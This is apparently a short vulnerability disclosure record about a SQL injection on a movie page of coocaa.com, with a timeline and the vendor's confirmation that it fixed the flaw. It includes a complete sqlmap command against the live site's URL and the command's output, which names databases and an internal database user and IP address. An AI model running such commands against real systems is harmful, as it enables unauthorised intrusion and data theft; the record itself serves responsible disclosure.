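2015-01-07: Details reported to the vendor; awaiting vendor action
2015-01-08: Vendor confirmed; details disclosed only to the vendor
2015-01-13: Vendor fixed the vulnerability and voluntarily disclosed it; details disclosed to the public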
sqlmap -u "http://movie.coocaa.com/self/pl.php?id=3391750&classid=62" --random-agent --dbs
[*] coocaa_web_new
[*] information_schema
[*] test
[*] 'web'@'192.168.0.52'
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-01-08 11:43
Thank you. We will fix it right away.
2015-01-13: Fixed